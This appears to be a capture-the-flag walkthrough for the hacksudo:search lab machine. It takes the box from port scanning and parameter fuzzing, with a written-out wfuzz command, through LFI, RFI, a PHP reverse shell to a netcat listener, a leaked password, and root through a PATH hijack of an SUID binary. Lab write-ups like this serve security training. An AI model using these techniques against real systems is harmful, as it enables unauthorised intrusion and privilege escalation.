This is another machine from Vishal Waghmare’s hacksudo series. You can download the box from the link hacksudo:search.
So lets start with nmap by scanning the machine for open ports.
Next step directory bruteforcing using gobuster.
Yes, there is a robots.txt…. but look what it is saying.
So I directly visited the search1.php
When I clicked on About and Contact it showed me below URLs.
The contact tab gave us a hint to search for the parameter. I used fuzz to do this task. Below is the command used for the same:
wfuzz -c -z file,/usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt — hh 2918 http://192.168.9.84/search1.php?FUZZ=contact.php
- -c gives the O/P with color.
- -z allows you to provide the list of payloads we want to use.
- — hh hide responses with 2198 characters.
- FUZZ is the parameter we want to fuzz.
LFI using search1.php, reading /etc/passwd
I tried different LFI to RCE techniques, and found that I can read /var/log/auth.log file. I also discovered that RFI is also possible. Lets try RFI.
RFI! What is RFI?
- RFI stands for Remote File Inclusion attack.
- This attack occurs when a web application dynamically includes scripts or files from an external URL without sanitizing it which then execute the command on either server or client.
To test if the application is vulnerable to RFI, I created a .php file on attacking machine with below contents:
Then started the python SimpleHttpServer and tried to fetch the test.php.
Reverse Shell:
To get reverse shell I copied php-reverse-shell.php from /usr/share/webshell/, changed the IP address with the IP address of attacking machine and port on which I want the reverse shell. Started the netcat listener on port 4444
Then tried to fetch the file as I did previously to get reverse shell. Finally, I got the reverse shell.
We have 4 users: hacksudo, john, monali and search.
LinPEAS showed me below file which looks interesting to me.
I tried to decode the base-64 decoded string, which gives me:
I also tried above username and password to login into mysql, but unable to do so.
After all this I list down the usernames we have:
USERNAMES: hacksudo, john, monali and search.
PASSWORD: MyD4dSuperH3r0!
Tried it with hacksudo first and BINGO!!! we are hacksudo now.
To get better shell and as SSH port is opened I used ssh using hacksudo.
Used find command to find the suid binaries, there is an unusual suid binary /home/hacksudo/search/tool/searchinstall
We are able to read the source code, as we see it is running install command but without full path.
Path to root:
- Create an executable file install with malicious payload in it. I copied /bin/bash in it. You can also make a file with reverse shell payload.
- Give it execute by all permission.
- Modify the path variable to point it to the directory where you place the malicious file.
Now execute the searchinstall file.
Thanks for reading!! Hope you like it.